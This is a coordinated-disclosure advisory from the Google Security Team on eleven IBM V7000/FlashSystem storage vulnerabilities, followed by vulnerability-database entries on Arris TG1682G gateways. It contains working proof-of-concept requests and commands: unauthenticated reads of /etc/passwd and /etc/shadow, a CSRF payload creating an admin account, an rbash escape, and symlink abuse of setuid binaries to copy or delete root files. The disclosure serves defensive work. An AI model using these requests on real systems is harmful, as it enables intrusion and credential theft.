01. CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified
allowing storage data access
02. CVE-2018-1433: Unauthenticated arbitrary file read via the
DownloadFile Handler / Authenticated arbitrary file read via the
DownloadFile Handler on v7000 Unified
03. CVE-2018-1434: Web interface vulnerable to CSRF
04. CVE-2018-1462: rBash ineffective as a security measure
05. CVE-2018-1463: World readable credentials and encryption keys
06. CVE-2018-1464: Sensitive file disclosure of files readable by root
07. CVE-2018-1495: Arbitrary file overwrite
08. CVE-2018-1467: Unauthenticated information disclosure
09. CVE-2018-1465: Unprivileged web server process may read SSL private
key
10. CVE-2018-1466: Weak password hashing algorithm used
11. CVE-2018-1461: Missing Security Related HTTP Headers
Vulnerability Details
=====================
---------------------------------------------
CVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified
allowing storage data access
---------------------------------------------
On the IBM V7000 Unified System the web handler /DLSnap does not require
authentication and allows reading arbitrary files from the system as
"root", including the data stored in the storage system from the mounted
shares.
GET /DLSnap?filename=/ibm/<redacted>/secret-file.txt HTTP/1.1
Host: v7ku01
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control:
Expires: Wed, 31 Dec 1969 16:00:00 PST
X-Frame-Options: SAMEORIGIN
Set-Cookie: SonasSessionID=<redacted>; Path=/; Secure; HttpOnly
Content-disposition: attachment; filename=secret-file.txt
Pragma:
Content-Type: application/octet-stream
Date: Tue, 16 Jan 2018 11:12:39 GMT
Connection: close
Content-Length: 4

42
--------------------------------------------------
CVE-2018-1433. Unauthenticated file read via the DownloadFile Handler /
Authenticated arbitrary file read via the DownloadFile Handler on v7000
Unified
--------------------------------------------------
In case of the following list of products, the DownloadFile handler allows
unauthenticated file reading under the "webadmin" user:
IBM Flashsystem 900
IBM Flashsystem 840
IBM Storwize V7000
Example request:
GET /DownloadFile?filename=/etc/passwd HTTP/1.1
Host: v7k01n02
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
On the V7000 Unified the same request handler allows reading arbitrary
files under the "root" user, however authentication is required here:
GET /DownloadFile?filename=/etc/shadow
Host: v7ku01
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <redacted>
-----------------------------------------------
CVE-2018-1434: Web interface vulnerable to CSRF
-----------------------------------------------
The main web interface on the V7000 Unified is vulnerable to CSRF and other
interfaces seem to be vulnerable as well. This could allow an external
attacker to execute commands on behalf of a user/administrator of the
system and potentially also access data stored on the system.
Example request (using a cross domain XMLHttpRequest):
POST /RPCAdapter HTTP/1.1
Host: v7ku01
Origin: https://www.example.com
Referer: https://www.example.com/create_admin.html
Content-Type: text/plain
Connection: close
Content-Length: 183
Cookie: <redacted>

{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.sonas.gui.logic.AccessRPC","methodName":"launchCreateUserTask","methodArgs":["my-secadmin","<redacted>",["Administrator"]]}
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=UTF-8
Content-Length: 319
Connection: close

{"clazz":"com.ibm.evo.rpc.RPCResponse","messages":null,"result":{"clazz":"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask","shouldBeScheduled":true,"started":1516202190188,"id":"<redacted>","name":"Create User", "state":"Running","status":"Task started.","progress":-1,"returnValue": null}}
---------------------------------------------
CVE-2018-1462: Ineffective rBash Configuration
---------------------------------------------
On machines with a restricted bash, a possible escape from rBash looks like
the following:
BASH_CMDS[escape]=/bin/bash;escape
--------------------------------------------------
CVE-2018-1463: World readable credentials and encryption keys
--------------------------------------------------
While some systems have removed the world-read bit from several files and
directories, more important files which contain application configuration
details, passwords and secret keys are world readable and sometimes also
world writable. On the IBM Flash System, this also includes the storage
encryption key.
# Partial directory listing of /persist/ on the Unified system:
drwxr-xr-x. 2 root root 4096 Jan 18 01:35 .
drwxr-xr-x. 29 root root 4096 Aug 15 16:16 ..
-rw-r--r--. 1 root root 27040 Jan 16 08:28 vpd
...
# Partial directory listing of /mnt/plfs on the Flash system:
drwxrwxrwx 4 root root 0 Dec 31 1969 .
drwxr-x--x 7 root root 1024 Jan 8 07:41 ..
-rw-rw-rw- 1 root root 24 Oct 24 2016 encryption.key
-----------------------------------------------
CVE-2018-1464: Sensitive file disclosure of files readable by root
-----------------------------------------------
The setuid binary svc_copy is a wrapper around the script sw_copy which
calls cp on the shell.
Creating a symlink to any file, this file can be copied as root to /dumps
and is world readable/writable (-rw-rw-rw- ):
$ ln -s /etc/shadow /tmp/shadow
$ ./svc_copy /tmp/shadow /dumps/
The file /dumps/shadow is now world readable with the permissions
(-rw-rw-rw- )
---------------------------------------------
CVE-2018-1495: Arbitrary file deletion
---------------------------------------------
The setuid binary log_cleanup is a wrapper around log_cleanup.py
This binary wipes the directories /dumps or /tmp and has an undocumented
feature "-s" (delete target of symlink).
The following command deletes an arbitrary file (e.g. /etc/shadow):
$ ln -s /etc/shadow /tmp/shadow
$ ./log_cleanup -s
Select /tmp as target directory to be wiped
--------------------------------------------------
CVE-2018-1467: Unauthenticated information disclosure
--------------------------------------------------
Some web handlers on the V7000 Unified expose system configuration without
authentication which could be used by an attacker to collect vital details
about the environment.
https://v7ku01/SonasInfoServlet?challenge=1
CLUSTER_ID=<redacted>;NAME=<redacted>.ibm;PROFILE=V7000 Unified;SYSTEM_NAME=<redacted>.ibm;mgmt001st001=<redacted>;mgmt002st001=<redacted>;idMapConfig=10000000-299999999,1000000;adHost<redacted>;krbMode=off;domain=<redacted>;idMapRole=master;realm=<redacted>;userName=<redacted>;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=<redacted>,S-1-5-21-<redacted>,auto;IDMAP_13000000-13999999=<redacted>,S-1-5-21-<redacted>,auto;
CHALLENGE <redacted>
-----------------------------------------------
CVE-2018-1465: Unprivileged web server process may read SSL private key
-----------------------------------------------
The current private key for the installed SSL certificate on the V7000 FC
CE Canister Node is readable by the webadmin user:
-rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key
As a result the file can be read through vulnerabilities in the web
application, e.g. via the DownloadFile handler (see separate issue).
Certificate details:
Validity: 15 years
Subject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076,
emailAddress=support@ibm.com
---------------------------------------------
CVE-2018-1466: Weak password hashing algorithm used
---------------------------------------------
The root password on the V7000 (CE) FC Canister and Flash System nodes
(and probably others, too) is hashed with a weak algorithm (DES) instead
of the SHA512 which is the system's default according to /etc/login.defs.
--------------------------------------------------
CVE-2018-1461: Missing Security Related HTTP Headers
--------------------------------------------------
XSS Protection HTTP Header
The XSS Filter is a feature that is built into modern web browsers and is
meant to prevent reflective Cross Site Scripting attacks. This feature can
be explicitly turned on (and also off) by using the HTTP header
X-XSS-Protection.
X-Content-Type Header
To make MIME type confusion attacks harder, the HTTP header
X-Content-Type-Options can be set. This header prevents trusting the user
provided MIME type and instead guessing the MIME type of the server
response.
Author
======
The vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and
Jan Bee from the Google Security Team.
Timeline
========
2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day
disclosure deadline (2018/04/26).
2018/01/29 - IBM acknowledges report and starts working on the issues.
2018/04/13 - IBM requested grace period due to internal patch cycle.
2018/04/16 - Google granted two week grace period (from 2018/04/26 to
2018/05/11).
2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List
VAR-201805-0541 | CVE-2018-10990 | Arris TG1682G Session expiration vulnerability |
CVSS V2: 7.5 CVSS V3: 8.0 Severity: HIGH |
On Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices, a logout action does not immediately destroy all state on the device related to the validity of the "credential" cookie, which might make it easier for attackers to obtain access at a later time (e.g., "at least for a few minutes"). NOTE: there is no documentation stating that the web UI's logout feature was supposed to do anything beyond removing the cookie from one instance of a web browser; a client-side logout action is often not intended to address cases where a person has made a copy of a cookie outside of a browser. Arris TG1682G contains a session expiration vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Arris Touchstone Telephony Gateway TG1682G is a combined modem and router device from Arris Group of the United States. A security vulnerability exists in the Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 release that causes the logout operation to fail to immediately clear all state on the device. An attacker could exploit the vulnerability to gain access.
Hi,
Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG)
Series devices, related to its web administration console.
The CVEs for these devices have been
created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991.
A blog post containing the full disclosure has been created:
https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c
Thank you.
Regards
Akshay 'Ax' Sharma
VAR-201805-0540 | CVE-2018-10989 | Arris TG1682G Vulnerabilities related to certificate and password management |
CVSS V2: 3.5 CVSS V3: 6.6 Severity: MEDIUM |
Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices are distributed by some ISPs with a default password of "password" for the admin account that is used over an unencrypted http://192.168.0.1 connection, which might allow remote attackers to bypass intended access restrictions by leveraging access to the local network. NOTE: one or more user's guides distributed by ISPs state "At a minimum, you should set a login password.". Arris TG1682G contains vulnerabilities related to certificate and password management. Information may be obtained or altered, and service operation may be disrupted (DoS). Arris Touchstone Telephony Gateway TG1682G is a combined modem and router device from Arris Group of the United States. A security vulnerability exists in Arris Touchstone Telephony Gateway TG1682G version 9.1.103J6, which stems from the admin account using the default password "password".
Hi,
Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG)
Series devices, related to its web administration console.
The CVEs for these devices have been
created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991.
A blog post containing the full disclosure has been created:
https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c
Thank you.
Regards
Akshay 'Ax' Sharma